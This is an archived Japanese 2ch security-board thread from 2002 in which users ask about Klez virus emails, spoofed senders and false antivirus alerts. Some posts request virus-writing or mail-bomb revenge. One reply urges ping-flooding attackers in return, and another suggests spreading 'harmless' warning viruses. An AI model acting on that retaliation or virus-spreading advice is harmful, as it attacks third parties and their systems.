g. [Organization] CTS(SOUTH TOKYO CABLETELEVISION)
m. [運用責任者] SA114JP
n. [技術連絡担当者] SM992JP
p. [ネームサーバ] dns01.cts.ne.jp
p. [ネームサーバ] dns2.odn.ne.jp
y. [通知アドレス]
[email protected] [割当年月日] 1998/03/04
[最終更新] 1999/07/15 11:47:49 (JST)
[email protected]
檻 ウィルス隔離フォルダのこと。 使用例:昨日アングラサイトでウィルスに感染したが、 駆除できなかったんで檻の中に入れといたよ。 ペット 隔離フォルダの中で飼っているウィルス。 使用例:俺のペットハイブリスだよ。
なんか誤爆ぽいけど・・・ ウィルスの保存はzipで二重圧縮、二回目をpass付きにしてるんだけど これじゃぁダメなの?
偽装かぁ、早速実行します
596 :
名無しさん@お腹いっぱい。 :02/08/26 23:08
最近ウィルス添付らしきメールが毎日来るようになってしまいました。 開かなければ放置して削除してしまえば大丈夫でしょうか? メールが来なくなるような方法は無いのでしょうか? こういった事に疎いもので詳しい方是非教えてください。お願いします。
598 :
名無しさん@お腹いっぱい。 :02/08/26 23:26
読んだのですがチンプンカンプンなんです。 どなたか教えてください、お願いします。
599 :
名無しさん@お腹いっぱい。 :02/08/26 23:28
読んでダメなら教えてもダメだろうね
600 :
名無しさん@お腹いっぱい。 :02/08/26 23:45
そんなこと言わずに
>>596 のレスに関して教えてください。
親切な方、お願いします。
このようなメールを送られてきた事が今まで一度も無かったので
対処の仕方がまるで解らないのです。
とりあえず今は全部開かずに削除しているのですが・・・。
>577 レスありがとうございます。早速やってみたら(できた)、stopアイコン表示の 圧縮ファイルが2個あったんですがとりあえずウイルスにはかかってない もようです。よかった…。結局メールは自分でなんか重要なものを 消しちゃったみたいです…(鬱 Outlookはようこそメールが着てたのでもう諦めましたがポスペは 件名は全て残ってる…。本文のみ白紙。もうやってられません。はあ…
602 :
名無しさん@お腹いっぱい。 :02/08/27 00:00
>>600 それでいいんでない?
んじゃなきゃ受信拒否かnPOPで鯖から直接削除とか
後はヘッダ読んで相手がわかれば相手のプロバに相談とか
あ、ヘッダの読み方くらいは検索しようね
603 :
名無しさん@お腹いっぱい。 :02/08/27 00:11
>602 >んじゃなきゃ受信拒否かnPOPで鯖から直接削除とか >後はヘッダ読んで相手がわかれば相手のプロバに相談とか こういった事の意味がまるでわからないのですが・・・。 相手が誰だかメールを開かなくても解るのですか?
あとウィルスに感染していなければ 個人情報とかは流出されてないのでしょうか? 本当に申し訳ありません、教えてください!
>>604 ウイルスに感染することと個人情報が流出することに関連はあまりない
個人が個人情報を流出するのはまずありえないことだし
>605 解りました、有難うございます。
607 :
名無しさん@お腹いっぱい。 :02/08/27 00:36
608 :
名無しさん@お腹いっぱい。 :02/08/27 00:42
毎日ウイルスメールが来るのですがどうしてでしょうか?実害は無いのですが、原因を知りたくて。
610 :
名無しさん@お腹いっぱい。 :02/08/27 01:06
2chの半角板に逝ったらウイルス検知した。
611 :
名無しさん@お腹いっぱい。 :02/08/27 01:10
ノートン先生ならよくやることだからきにしるな
612 :
名無しさん@お腹いっぱい。 :02/08/27 01:31
>>607-
>>608 過去ログ読んでも全く解らないヤシには
参考ページも無駄だと思うよ。
読むのが面倒って正直に言えばいいのにね。
613 :
名無しさん@お腹いっぱい。 :02/08/27 02:45
ウィルスの作り方教えて
ネットワークセキュリティ@2ch掲示板 この板は、LANや個人のPCへの侵入、トロイ、ウィルス等、 様々なネット上の危険からの防御法や対策を語りあうための板です。
615 :
名無しさん@お腹いっぱい。 :02/08/27 02:49
教えて教えて教えて教えて教えて教えて 教えて教えて教えて教えて教えて教えて 教えて教えて教えて教えて ウィルスの作り方教えて
検体 1.土に水と砂糖を加え、よくかき混ぜ、しばらく暗所で放置する 2.浮いてくるごみを丁寧に取り除き、水分を少量掬い取り、残りは捨てる 培地 1.棒寒天を水で戻し、薄く切って皿に盛る 培養の仕方 1.検体を培地に数滴落し、暗所で数日放置する 2.コロニーの中心を掬い取り、種類毎に新しい培地に盛り、残りは捨てる 3.コロニーの形成を確認し、紫外線を照射する 4.そのまま培養し、ブロック毎に切り分ける 5.ブロック毎に培地に盛り、培養する 6.ブロック毎に切り分け、耐性をテストする 7.検体が全部のテストに合格するまで2〜6を繰り返してでき上がり 培養時の注意 アオカビがつかないよう注意しましょう(アオカビを培養する場合を除く) 定期的に紫外線を照射し、雑菌の繁殖を防ぎましょう(最初の培養を除く) 紫外線で誤って検体を殺してしまわないよう注意しましょう
>>607-608 ご親切に本当に有難うございました。
何とか分かりました。
>・・・Macユーザーですとかいうオチはないよね?
違います、大丈夫です(w
>612
氏ね。
618 :
名無しさん@お腹いっぱい。 :02/08/27 07:54
619 :
名無しさん@お腹いっぱい。 :02/08/27 08:38
Host()ウィルス まだぁ?
620 :
名無しさん@お腹いっぱい。 :02/08/27 11:43
age
621 :
名無しさん@お腹いっぱい。 :02/08/27 16:42
あ
622 :
名無しさん@お腹いっぱい。 :02/08/28 00:04
age
624 :
名無しさん@お腹いっぱい。 :02/08/28 07:45
625 :
名無しさん@お腹いっぱい。 :02/08/28 09:24
すみません。なんかハードディスクがいつのまにか満杯になってしまいます。 はじめのうちは色々削除したりしながら空きを作ってたのですが最近なにもファイル 増やしていないのにまた残り20Mくらいになってしまいました。確実に おとといは1Gくらい空きを作っていました。ウイルスってことあるのでしょうか? お願いします。おしえてください。
あぼーん
627 :
名無しさん@お腹いっぱい。 :02/08/28 10:03
628 :
名無しさん@お腹いっぱい。 :02/08/28 10:18
630 :
名無しさん@お腹いっぱい。 :02/08/28 11:06
631 :
名無しさん@お腹いっぱい。 :02/08/28 11:24
>>625 最近何かで読んだなあ。詳しいことは覚えてないがウィルスじゃない。
隠しファイルだかなんかが膨れ上がってるんだったか・・・
自分で本屋行ってしらべてみ。結構分厚い本だったぞ。Windows辞典とか・・・
633 :
名無しさん@お腹いっぱい。 :02/08/28 14:05
定期あげ
635 :
名無しさん@お腹いっぱい。 :02/08/28 16:52
subjectが Re:***,sos! (*** は俺のアカウント名)という HTMLメールが届いたんですが、 Lztk.scr と gms-small[2].jpg が添付されてました。 KLEZっぽいんですが、何でしょうか?
>>635 まあKlezでしょう。
って何でアンチウイルスでスキャンしないの?
637 :
名無しさん@お腹いっぱい。 :02/08/28 17:17
>636 うちのメーラはhtmlメールを開かず、添付ファイルをデコードしないので ウイルススキャンに引っかからないんですよ よって添付ファイルを強制的に開かない限り感染の心配ないですけどね
638 :
名無しさん@お腹いっぱい。 :02/08/28 17:20
639 :
名無しさん@お腹いっぱい。 :02/08/28 20:55
>618 お前、頭悪いな。ここが何のスレか考えてみろ、ニホンゴヨメマスカ? >もう二度とセキュ板来んな オマエガナー
>って久しぶりに見たbyねこたん
初心者です。質問ですが クレズウィルスは hotmailで開いても感染するのですか?
>>642 も同じ穴のムジナだろう。アフォ度はお前が上だ。
答えてやったらイイだろうが。
644 :
名無しさん@お腹いっぱい。 :02/08/28 22:55
>>641 えーとねぇ・・・
(V) ∧_∧(V)
ヽ( ゚▽゚)ノ オシエマシェーンだ
/ /
ノ ̄ゝ
641=643
馬鹿しかいないね、こういうところ
よろしくお願いします。 先ほど怪しいメールが届きました。 タイトル:次を検索 差出人:0909878****@jp-k.ne.jp 本文:(空白) 形式:HTML 差出人が携帯電話なので安心して開封してしまいました。 これってウィルスでしょうか?メーラーはOutlook2000、 OSはwindowsME、Klez対策はしてあります。 どなたかコメントください。お願いします。
他で尋ねます。失礼しました。。。
あぼーん
>>649 おそらくね
怖いともうなら検索するなり
>>1 のリンク先でもみて勉強してくれ
メールアドレス晒してた
653 :
onnbody :02/08/29 02:58
>>652 >メールアドレス晒してた
あー、うっかりしてました。つぃ。
すいませんでした。ご迷惑おかけしました。
つか自分のだべ あぶないから気をつけれ
最近、突然現れるようになった症状なのですが ケーブルの常時接続環境なのに、回線が一瞬だけ切断されるのです。 東風荘等のオンラインゲームをしている時にも 突然切れるので非常に困っています。 ノートンには何も反応しないし、切断時ZoneAlarmも無反応です。 Ad-awareも使ってみました。 ノートンでも発見できない新種のウイルスじゃないかと不安です・・・ どなたか対処法が分かる方がいたら助けてください・・・
肝心なことを書き忘れてました。 回線は必ず約30分に1度の周期で切断されます。 あと同じプロバイダの友人にはこの症状は現れないため、 プロバイダが原因ということは無さそうです。 本当に原因不明です・・・
657 :
名無しさん@お腹いっぱい。 :02/08/29 04:53
どうして回線が切れることからウィルスまで話が飛躍するのかがわからない >突然現れるようになった症状なのですが ウィルスなりアプリのバッティングなりが原因なら 何かした覚えがあるだろうに >あと同じプロバイダの友人にはこの症状は現れないため たった一例でそうでないと言い切れる自信はどこから? プロバ板にいったほうがいいと思うね
>>657 アプリ系は特に心当たりないです・・・
>たった一例でそうでないと言い切れる自信はどこから?
確かにその通りです。軽率でした。
ただ本当に原因不明なため、ウイルスのせいにすることしか
思いつかなかったのです・・・
ではプロバ板に逝ってきまふ・・・
レス有り難うございました。
659 :
名無しさん@お腹いっぱい。 :02/08/29 06:19
フツーに考えて既出の原因の量と可能性なら 回線問題(プロバ・モデム・その他)>>>>>>>>>>ウィルス だべよ
>>659 本当に肝心なことを書き忘れていたんですが、
コントロールパネルに【ネットワークとダイアルアップ接続】って
あるじゃないですか?その接続維持時間はリセットされないんですよね。
だから回線問題よりもウィルスの方を疑ってしまったんですよね。
例えば強制的に何処かに接続しようとしているんじゃないか・・・
などの可能性を考えてしまったんです。
あとプロバイダの方にも連絡したんですけど
やっぱり原因不明だと言われて・・・
でも、もう一度回線問題方面(プロバ・モデム・その他)も
調べて直してみます。
661 :
名無しさん@お腹いっぱい。 :02/08/29 10:19
ターミナルの設定では?
掲示板がクラックされた時のクラッカーに対しての対処法をおしえていただけませんか?
>>654 自分のじゃないんですよ(藁
なおさらですよね。
というか、その番号自体が存在しているのか不明ですが。
メールの方は削除しました。
昨日、普通にチャットしてたら、「お前○○県の○○接続だろ」とか言われました。 仕返ししてやりたいので、方法を教えてください、少しは勉強してきました。
>>661 ターミナルの設定を見直してみたのですが、
特に異常は見つかりませんでした・・・
ただ皆さんのレスで
「ウィルスが原因という可能性は低い」ということが
分かったので少し安心できました。
あとは回線自体の問題のようなので
もう少し色々とやってみます。
レス本当に有り難うございました。
>>665 worm(ワーム)ってじぶんで書いてるべ
P2P云々は
あんたみたいなのがいると、まぁばら撒いてみたくなんでないのかね
>>665 そうじゃなくて無害のウィルスをばらまいて、
こういう感染ルートがあるから気を付けろっていう警告みたいな
ウィルスの事だよ。
あとMXは使った事ないです。
673 :
名無しさん@お腹いっぱい。 :02/08/29 18:00
改竄されたページを見るたび思う 日 本 語 で 書 け !!!
どこがウイルスなんだろうか(以下略)
>>672 I just Wanna s4y f**k USA Gouvernement And israel
Must Be F**k3d oFF
(´_ゝ`)フーン
676 :
名無しさん@お腹いっぱい。 :02/08/30 01:57
質問です。 個人で商用サイトを運営しているのですが、 毎日毎日6人(多分・・・)の方からWORM_KLEZ.Hを添付したメールを頂いております。 かれこれもう4ヶ月。 一応警告のメールを何度か出し、 「全く気付きませんでした。ありがとうございました」との 返信は貰ったのですが・・・ 私の方は、プロバイダーでウィルスチェックをして貰っているので、 既に駆除済みのものが届きますので心配はないのですが、 プロバイダーからのウィルス検出のお知らせも同時に届くので非常に困ります。 2人のうちの一人は過去のお客様ですのであまり強くも言えずにいたのです。 でもいい加減運営に差支えがでて来たのでウィルスメールのアドバイスHPに あった方法通り、私のHP上に警告文を乗せようと思ったのです。 プロバイダーからのアラートのおかげで、発信元のアドレスはわかっているのですが・・・ やっぱり晒すのはマズイですよね? こういう場合はどうしたら良いのでしょうか? よろしければご意見をお願いしたいです。
>2人のうちの一人は過去のお客様ですので 「6人のうち2人は」の間違いでした。 すみません・・・
ここで聞かれてもなぁ セキュリティ云々でなくて商売の問題だべ 添付ファイルは受けとんねぇよってページに書いて 添付ファイルはそのままゴミ箱とかに振りわけっとか
679 :
名無しさん@お腹いっぱい。 :02/08/30 04:08
なんか矢印等が文字化けしているんですが、これはウイルスなんでしょうか? あと最大化と最小化、閉じるのとこが意味不明な記号になっているんですが
680 :
名無しさん@お腹いっぱい。 :02/08/30 04:20
681 :
名無しさん@お腹いっぱい。 :02/08/30 05:18
682 :
名無しさん@お腹いっぱい。 :02/08/30 13:06
ウイルスを送りたいのですが、どうすれば・・・?
>>682 メールに添付して送る。メールの送り方わかる?
684 :
名無しさん@お腹いっぱい。 :02/08/30 16:10
すいません、教えてください。 webメールでホットメールを使っているのですが、(ブラウザはIE6です) 最近、本文なし・添付ファイルなし・件名のみのメールがよく来ます。 でもメールのサイズが、130〜140KBくらいあります。 添付ファイルがないのでウイルスじゃない気もするのですが、 どうなんでしょう? それとも、差出人が何かしらのウイルスに 感染しているということでしょうか? ちなみに差出人は毎回ばらばらで、 普通のプロバイダーのアドレスや、 無料チャットレンタルサイトやネットショップのアドレスです。 (↑ググったら出てきた) しかし、そのレンタルサイトやネットショップなどのサイトに 訪れたことはありませんし、 普通のプロバイダーのアドレスの人も、 全く知らない人です。
>685 ま、ウィルスでしょう。 実際には添付ファイルがあったんだけど、 デコードミスかhotmail のウィルス対策かで出てこないだけでしょ。 知らない人なんでしょ、差出人は。 だったらあっさりと削除。
687 :
名無しさん@お腹いっぱい。 :02/08/30 17:11
PE_FUNLOVE.4099って感染するだけで害は無いって本当でしょうか? 俺のPCは感染してからoutloockの起動が異様に遅くなったり日本語で 入力できなくなったり小トラブルが続発します。 あと、感染してないPCを使わず自力で駆除する方法はないでしょうか。
689 :
名無しさん@お腹いっぱい。 :02/08/30 17:28
謎のメールが会社のメールにも個人のメールにも立て続けに来ている。ひええ。 User.zipってのとSetup.zipてのが添付されてます。これってウイルスでしょ? 個人のにはなんと会社のアドレスから来ているのですが、トレンドマイクロのホームページで検索してもひっかからなかったんだよね。 それでも感染してるのかな。はああ
>>688 そこを熟読した上で訊いてるんだけど・・・
まぁサンクスコ。
691 :
名無しさん@お腹いっぱい。 :02/08/30 17:33
>>689 件名だの添付ファイル名で正確なウィルス名を割り出せる時代は終わった。
スキャンする気すらないならこんなとこに書き込むな
なんか嫌な書き込みだなぁ。 そんな書き方してると誰も答えてくれなくなるぞ。
694 :
名無しさん@お腹いっぱい。 :02/08/30 17:40
なんだかいろいろ足りない書込みですまんです。みなさん気が立っているよね。 トレンドマイクロのホームページからウイルススキャンをしても何も検索されなかったPC(会社の)から、謎の添付ファイルが送られて来ているということです。 会社でやりとりをしている所で感染してしまったPCがあり、そこがうちの会社を差出人として私宛にメールを送っているんではないかと、その感染したPCの持ち主は言ってます。(会社のと私のと両方のアドレスがそこには入っている) でもそんなのってありえますか?差出人まで偽装なんてしませんよね?
>差出人まで偽装なんてしませんよね? (゚Д゚)ハァ? __ __ __ |よし| ΛΛ |よし| ΛΛ |よし| ΛΛ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ 〃 ̄∩ ゚Д゚) 〃 ̄∩ ゚Д゚) 〃 ̄∩ ゚Д゚) < 全員一致で逝ってよし! ヾ. ) ヾ. ) ヾ. ) \_____________  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\ \ \ | ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ | | 逝ってよし認定委員会 | | | \| |
699 :
名無しさん@お腹いっぱい。 :02/08/30 18:08
つか君の会社のPCはもう色んなところにウィルスメールを送り続けてるかもね
700 :
名無しさん@お腹いっぱい。 :02/08/30 18:08
>>696 Klezスレ読んだこと有る?てか、KlezがReturn-Pathなどを偽装するなんてこと、もう10年まえから常識だと思ってたYO!
それで、チミはメールのチェックはできているの?ウィルス対策ソフト入れてないって言ったらぶっとばすよ?
701 :
名無しさん@お腹いっぱい。 :02/08/30 18:11
もう10年まえから常識だと思ってたYO!(・∀・)ンナワキャナイ!!
702 :
名無しさん@お腹いっぱい。 :02/08/30 18:14
>>689 >トレンドマイクロのホームページからウイルススキャンをしても
どゆ職場かは知らんが。
感染の疑いがあるパソはLANから切り離す、これ常識。
Return-Pathかもしれぬが、よー分からんのが実情。
689は失踪したようですな(w
707 :
名無しさん@お腹いっぱい。 :02/08/30 18:39
>みなさん気が立っているよね。 んなこと言わなきゃいいのに
>689 半分ネタかと思っていたが、雲隠れしたところを見るとマジだったんだな
漏れの知人にさぁ。 相手を怒らすような事を自分から散々言ったくせに、とうとう相手が怒ると、「あんたは気が短い!」とか「私はこんなに困っているのに!なぜいじめるの!」ってわざとらしく騒ぐヤシがいる。 ちょっと、いや、かなり怖い。
711 :
名無しさん@お腹いっぱい。 :02/08/30 19:09
俺が初心者の頃2chはなかった 俺が初心者の頃パソコン通信なんてもっとコワイ奴らでいっぱいだった 俺が初心者の頃検索エンジンにマシな情報は引っかからなかった 俺が初心者の頃常時接続なんかなくって電話代の請求書ほど恐ろしいものはなかった 俺が初心者の頃PCはワケワカラン落ち方をした何でOSが落ちたかなんてわからんかった 今お前らは恵まれていることを忘れるな
ちんぱらって本当カスだね。誰がCD買うの?
>>685-686 ありがとうございます。
今までは、ちょっと気にしつつ考えつつ削除していたのですが、
これからは容赦なくばっさり削除することにします。
718 :
102 ◆Yh/5fqs. :02/08/30 23:55
720 :
名無しさん@お腹いっぱい。 :02/08/31 03:08
質問があるのですが、どなたか教えて頂けませんか? わたしが使っている一つのメールアドレス(一般的な有料プロバイダ)に、 今月だけで数えると、18件のウイルス付きメールが来て、 その全部のヘッダーに以下の表示があるのです。 Received: from unknown (HELO smtp.yukaido.ne.jp) (210.230.82.4) Received: from jxxxxxx.ap.plala.or.jp (218.224.xxx.xx) ちなみに差出人表示は17人分で、それぞれドメインはバラバラのようです。 (一人だけ2通) こういう状態で何ヶ月か続いてるので、誰かに嫌がらせされてるのかと 思うのですが、どこに聞くのが一番良いのでしょうか。 この愉快堂、もしくは、plala に聞けば、なにかしらの糸口は見えるのでしょうか? なにか情報が足りなければ、追加でまた書き込みますので、 どうかよろしくお願いします。
721 :
名無しさん@お腹いっぱい。 :02/08/31 03:20
愉快堂ってISPなのか ・・・さてと首でも吊ってきますか
723 :
名無しさん@お腹いっぱい。 :02/08/31 03:42
早速のお返事ありがとうございます。 おっしゃるようにノートンの表示は W32.Klez.H@mm になってまして 下側のリンクで調べてきました。 どうやら plala に感染者がいるようなんで、問い合わせのメールを 送ってみます。 調べ方が悪かったようでお手数をおかけしましたが、とにかく 素早い返事をありがとうございました。 ちなみに愉快堂(=yukaido)のつもりでした。失礼しました。
http://www.nanet.co.jp/rlytest/relaytest.html smtp.yukaido.ne.jp
<220 smtp.yukaido.ne.jp ESMTP
>HELO rlytest.nanet.co.jp
<250 smtp.yukaido.ne.jp
>MAIL FROM:< TESTwww.nanet.co.jp/rlytest/requestedfrom[61.211.31.103]@smtp.yukaido.ne.jp >
<250 ok
>RCPT TO:<rlytest@nanet.co.jp>
<250 ok
>QUIT
<221 smtp.yukaido.ne.jp
問題あり:不正な中継を受け付けます。
(210.230.82.4)
ORDB database...登録されていません。
maps realtime blackhole list...登録されていません。
最近、知らない人から本文無しなんだけど容量がやたらでかいメールが来る… 添付ファイルとかないんだけど。件名が、Language(だったかな?)とか書いてある。
>>727 ここは近況報告をするためのスレですか。
730 :
名無しさん@お腹いっぱい。 :02/08/31 19:08
2chのえっちねたの過去ログ見ようとするとVBS.Loveletter.A に感染しました、と警告が出るんですけどこれは俺のせいですか? メールは使って居ないのでそこから感染した訳ではないと思うので 不思議です。誰か謎を解明してください。
>>727 添付ファイルのデコードに失敗しただけなんではないでしょか。
>>731 うわーん。馬鹿って言うなよ。
知らなかったんだから。でも教えてくれて
ありがとう。助かりました。
734 :
名無しさん@お腹いっぱい。 :02/09/01 17:02
シマンテックのKlez.Hのページから引用ですが、これについて質問なんです。 > Windowsのアドレス帳、ICQデータベース、ローカルファイルから探し出した > メールアドレスすべてに対し、自分自身を添付した電子メールを送りつけます。 > 差出人のアドレスは、感染先コンピュータ上で発見したメールアドレスから > ランダムに選択されたものが使用されます。 これは、送信者は一人だけが選ばれるのでしょうか?それともある程度複数? 届いたウィルスメールの中に、自分が送信者になったものが今の所無いので 全員が送信者にさせられる、って事はないでしょうけど。 > そのメールの受信者が適切な修正プログラムが適用されていないMicrosoft Outlook または > Outlook Expressで受信した場合、添付ファイルが自動的に実行される可能性があります。 又、感染に気付かない時は繰り返し発信するようですが、自動実行のタイミングと言うのは PCを起動した時なのか、OEを起動した時なのか、それとも回線を接続した時?(繋ぎっぱの場合は?) そして送り続ける時は同じ送信者名なのか、毎回違う名前に変わるのか・・・? いろいろ聞いてしまいましたが、ご存知の方よろしくお願いします。
735 :
名無しさん@お腹いっぱい。 :02/09/01 17:39
736 :
教えてください :02/09/01 19:22
有るところから、しつこくウイルスメールらしきモノが来ます。
ヘッドが以下のようになっているんだけど、
Return-Path:
[email protected] Date: Sun, 1 Sep 2002 17:10:13 +0900 (JST)
From: cccccccc <
[email protected] >
To: xxxxxxxxxx.ne.jp
のようになってるんだけど、(xxxxxxは当方のアドレス)
このメール、aaaaaaaから来てるのか、ccccccから来てるのかどっちでしょうか。
>>736 どちらも信用できないことがある。
もしKlezなら当然。
ナゴヤ(・∀・)ヤットカメ!!
740 :
名無しさん@お腹いっぱい。 :02/09/01 19:42
アワユキ(・∀・)ウィロウ!!ダギャァ
股、北!!!!!!!! KlezH
Received: from smtp01.asahi-it.com (EHLO smtp.asahi-it.com) (210.174.168.200)
by **
Received: from Ewhohgn (p78a29e.kngwnt01.ap.so-net.ne.jp [61.120.162.158])
by smtp.asahi-it.com (8.11.1/3.7W) with SMTP id g813ul093665
for <.co.jp>; Sun, 1 Sep 2002 12:56:47 +0900 (JST)
Date: Sun, 1 Sep 2002 12:56:47 +0900 (JST)
Message-Id:<
[email protected] >
From: onio <onioni____________@juno.ocn.ne.jp>
To:
[email protected] [email protected] [email protected] [email protected] [email protected] Subject: (c) 2002 multi Allright reserved.
>>738 即、消したけど、
The Garden of Eden
なんて書いてました。
WINDOWSBOMB.Eって何者でしょうか? どこを探しても載っていないようです。 どなたかご返答お願いします。
放置されっぱだ・・・(ρ_・。) クスン マルチたんの気持ちがチョト判る罠
>>734 1つの詐称アドレスを使い続けるのかは確証がないので答えにくい。
気になるなら閉鎖環境で感染させて調べてみてくれ(w
Klezは自前のSMTPで送信するので感染後はOEの起動は関係ない。Windowsの起動時。こ
れはシマンテックやトレンドマイクロのサイトでわかること。
答えにくいことや調べればわかる質問は放置されるぞな。放置に理由あり。
>745さん。 ありがとうございました。 以前変なリンクをクリックしたらホモのブラクラ に引っかかったのでその時ですね。 ほっておいても大丈夫そうですねー
749 :
しょぼいやつ :02/09/02 17:18
昔から女にはもてなかったが、昨日はひどいいわれかたで馬鹿にされた 同じように女に馬鹿にされつづけた人俺の復讐に協力してくれ こんなむかつく女に携帯が使えなくなるようにメールボムを送ってやたい
>>749 この板は、LANや個人のPCへの侵入、トロイ、ウィルス等、
様々なネット上の危険からの防御法や対策を語りあうための板です。
掲示板の荒らし方や侵入の方法、メールボムの送り方等、
攻撃方法の質問はご遠慮下さい。
2ちゃんねるでは荒らし依頼は出来ません。
また、この板ではアタック依頼は受け付けません。
攻撃依頼を見かけた方は、放置してください。
ネット犯罪の被害者になってしまった方は、まず警察にご相談下さい。
752 :
教えてください :02/09/02 21:32
2ちゃんのレスの名前のところをクリックすると、時々自分のアドレスに登録している情報が載っていることがあるんですけど… これってやっぱりウィルスですよね。 どなたか解決策を教えてください
返答ありがとうございます。 そもそもクッキーって名前はしっているけど、どういうものかしらないほどのど素人なものでして… もっと勉強しなきゃだめですかね? こっちがPC原人じゃ説明しようもないでしょうし。 すんませんです
>>754 ブラウザから設定できるクッキー。
IE6ならプロパティ→全般タブ→インターネット一時ファイル→Cookieの削除、かな。
ちゅうか漏れ、検証していないんだけど(だってどの板かわからんし、2chにクッキー取られたくないし
どでしょ。
>>755 E-mail
まずは返答ありがとうございます。ためしてみます。
一応具体的に述べますと、「E-mail」のところにスペースをいれた書き込みにかぎり、そのE-mailにメールアドレスからランダムで名前が乗るような症状です(ちなみにこのレスのE-mailにもスペースを入れいております)。
トレンドマイクロにも聞いてみたのですが、「よくわからん」との返答でした…
こういうウィルス(?)などに対してはノートンやウィルスバスターを購入すればいいのでしょうか?
自分のような無知な人間はウィルスHPに書いているような対策は知識がなさすぎて実行できないものでして。
なにかいい製品がありましたら、ご紹介いただければ幸いです。
でも、面倒な場合はレスは結構です。
本当にありがとうございました。
あと、あげてしまってすみません。
>>756 漏れそゆ症例、知りませぬ。
メアド抜きなんてブラウザの設定を固めていれば、まず無いことだし。クッキー抜きとか、Java Scriptの設定を甘くしていると、抜かれたりすることはありまするが。
お力になれずにスマンっす。
758 :
名無しさん@お腹いっぱい。 :02/09/02 22:26
本当にありがとうございました。 親切に対応していただきまして、ただただ感謝です。 いただきました意見を参考にさせていただきたく思います。 どうもありがとうございました。
これのことか?
どれ?
761 :
名無しさん@お腹いっぱい。 :02/09/02 23:02
>>752 で、何をもって君はウィルスと決めつけたのだ?
トレンドマイクロにTELして仕事の邪魔して迷惑かけるより
初心者板の過去ログ見なさい。何度も出とる。
ここじゃ板違い。
すまん、愚痴らせてくれ........ Klezが50通くらい来た(webメールは"壊れたメール"で一杯で激重に) んで、ヘッダ見たら最下段のReceiveとReturn-Pathが2通を除いて同一 だった。 これは間違いないだろと思ってメルアド検索したら HPに辿り着いた。(geocities.co.jp/MusicHall-Horn/5237/ ) 掲示板に何度も警告を書いたが何度やっても消された。 その間にもわらわらウィルスは来る。 そして、数日後本人はようやく気付いたようだった。 その時の奴の掲示板での一言。
>泣いちゃうわ! > >今ハヤリの「klez」とかってヤツに感染してもうた!!! >♪あ〜あ やんなっちゃった〜 あ〜あ 驚いた♪(by牧伸二) >もしかしたらklezを作ったヒトがここ読んでるかもしれないから言って >おくけど(まずありえんけどな)、こんなすごいウイルスつくるくら >いの頭脳があるなら、もっと有効な使い方をしなさい!! >みなさんもご用心♪ > >遅れたけどおニャン子再結成おめでとう。 これじゃウィルスが無くなるわけがない。 コイツン中じゃ Klez=おニャン子再結成レベル。 こんなんばっかなのか? そして、その後3日間きっちりとウィルスは来た。 鬱だ。 プロバは、片手間にCATVやってる業者でメールも読んでないみたいで 返事はねぇし。鬱だ。 長文スマソ。読み流してくれ........逝ってくる
766 :
名無しさん@お腹いっぱい。 :02/09/03 00:06
しらない間にアイコンが別のものに変わってるんですが、 これはウイルスですか?
>>764 ンデ、お宝添付ファイルは何か有ったのか??
まさか、50通もそのまま捨てたんぢゃ無いだろうな。。
・・・・モッタイナイ
>>764 エクセルで顧客のメアド管理してるアダルトグッズの通販業者からなら面白いのにな。
Klez.Hのばあい。
>>764 相手の馬鹿さ加減は見届けてやったから元気出してがんがれ
>>770 >計画では、研究機関や企業に呼びかけて体制を組む。実際に出回っているウイルスを
企業や個人から提供してもらうほか、
モ、漏れのコレクション、、、ヒトクチ幾らで買ってくれるかな。。。。
つか、自作ウイルスとか買ってくれるんかな...
サイト作ってアピールするかな ハァハァ・・・・
772 :
名無しさん@お腹いっぱい。 :02/09/04 18:29
>ウイルス対策のワクチンソフトや感染をチェックするソフトの開発を手がける企業と競合して >「民業圧迫」と批判を招かないよう、研究のための情報の蓄積や提供にとどめるという。 骨抜きの悪寒…
>>771 一攫千金。。。。。にゃ
>>772 そ言えば、日本国内のアンチウイルスソフトベンダーって、「株式会社山田洋行」だけだったような記憶。
あ、ブックマークが死んでる。
774 :
名無しさん@お腹いっぱい。 :02/09/04 21:03
お気に入りのフォルダから2ちゃんの自作板を選択して
(
http://pc3.2ch.net/jisaku/ )を開いただけでノートンが反応し
Macro.srcに感染しました修復できませんってメッセージが出ました。
どうしてこうなっちゃったのか??です。
¥LocalSettings\TemporaryInternetFiles¥ContentIE5¥0123H67¥jisaku2
はMacro.srcウィルスに感染しています。
このファイルを修復できません。ってスキャンしたら出ました。
>>776 ありがとう、そのようですね。
慌てて過去ログ読んでいませんでした。
でもトップページで誤検出するとは、まいりました。
778 :
名無しさん@お腹いっぱい。 :02/09/04 22:30
すいません、番組実況板や自動車板等の2ちゃんの特定の板に逝くと マイクロメディアからフラッシュ6をダウンロードしる!みたいなのが 毎回確実に出るんですが、これってウィルスとかの可能性ありますか? マジで困ってるので教えてください
779 :
名無しさん@お腹いっぱい。 :02/09/04 22:37
インターネットセキュリティーが先ほどから高危険度の通信を浮けまくってます。 IPが何個かわかるのですが、そのIPから相手を特定すると買ってできるのですか? もしよければここに吊るし上げます。 本当に次から次へ来て、困っています。 環境はwin2000です。
>>778 多分、フラッシュの広告が2chに導入されたってことなんではないでしょか。
ちゅか、無視しれ。
どこのURLかわからんので、漏れは見ておりませぬ。
そゆ点はご自身で検証してくだされ。
>>779 情報不足。
>>778 バージョンアップしろ
まさかフラッシュプレイヤーが何かしらんとかいう馬鹿じゃないよな?
>>779 無視しろ
Whoisとかで相手はわかるが、だからどうしたという程度のもの
吊るし上げるつったって、この板じゃそんなオナニー野郎は無視されるだけ
やるならPingを10000回くらい打ち返せ
Ping1000000回打ち返すぐらいの気概が欲しいね
それとなぜ2ちゃんのある特定の板でしか出ないのかわかりません。
787 :
名無しさん@お腹いっぱい :02/09/04 22:56
[アプリ] CD革命6.0 Virtual Pro(win2k+Win9x+XP対応)(1)をwinMXでダウソしたんですが、
winMX落としてはいけないものリスト
http://mxtrojan.tripod.co.jp/ によると、再起動後、
全HDDを消去とあります。zipをおとしただけなら大丈夫でしょうか?削除したほうがいいですか?
なにとぞ教えてください。おながいします。
793 :
